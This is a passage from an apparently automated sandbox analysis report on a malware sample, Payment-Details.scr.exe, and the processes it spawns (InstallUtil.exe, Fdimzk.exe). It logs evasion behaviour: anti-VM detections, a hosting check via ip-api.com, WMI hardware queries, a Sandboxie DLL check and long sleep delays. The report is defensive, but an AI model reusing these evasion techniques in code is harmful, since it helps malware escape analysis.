                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: Payment-Details.scr.exe PID: 432, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Fdimzk.exe PID: 6012, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Fdimzk.exe PID: 3228, type: MEMORYSTR
                    Check if machine is in data center or colocation facility
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: Payment-Details.scr.exe, 00000000.00000002.1676003919.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1676003919.00000000037C9000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2016324901.0000000002381000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2012136822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2041551021.0000000003819000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2013699239.000000000273C000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2013699239.0000000002B02000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2100971081.0000000003269000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2100971081.0000000002F0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeMemory allocated: 1910000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeMemory allocated: 33B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeMemory allocated: 1910000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2190000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2350000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4350000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeMemory allocated: A00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeMemory allocated: 26F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeMemory allocated: C50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeMemory allocated: 11B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeMemory allocated: 2EB0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeMemory allocated: 1320000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 11C0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2D80000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4D80000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1230000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2C90000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4C90000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1799907
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1799782
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeWindow / User API: threadDelayed 2433Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeWindow / User API: threadDelayed 7381Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 2388Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 7452Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeWindow / User API: threadDelayed 3058Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeWindow / User API: threadDelayed 6780Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeWindow / User API: threadDelayed 4288Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeWindow / User API: threadDelayed 5484Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 2895
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 6937
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 2089
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 7769
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -99858s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -99749s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -99640s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -99531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -99421s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -99312s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -99203s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -99093s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -98984s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -98874s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -98765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -98643s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -98515s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -98406s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -98278s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -98172s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -98025s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -97914s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -97796s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -97687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -97578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -97468s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -97359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -97250s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -97140s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -97031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -96922s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -96797s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -96687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -96578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -96468s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -96359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -96249s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -96140s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -96031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -95922s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -95797s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -95687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -95578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -95439s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -95312s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -95201s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -94844s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -94718s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -94609s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -94500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -94390s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe TID: 4824Thread sleep time: -94281s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep count: 45 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -41505174165846465s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3848Thread sleep count: 2388 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -99890s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3848Thread sleep count: 7452 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -99780s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -99670s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -99561s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -99452s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -99342s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -99233s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -99124s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -99014s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -98905s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -98795s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -98686s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -98522s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -98353s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -98052s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -97921s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -97812s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -97702s >= -30000sJump to behavior
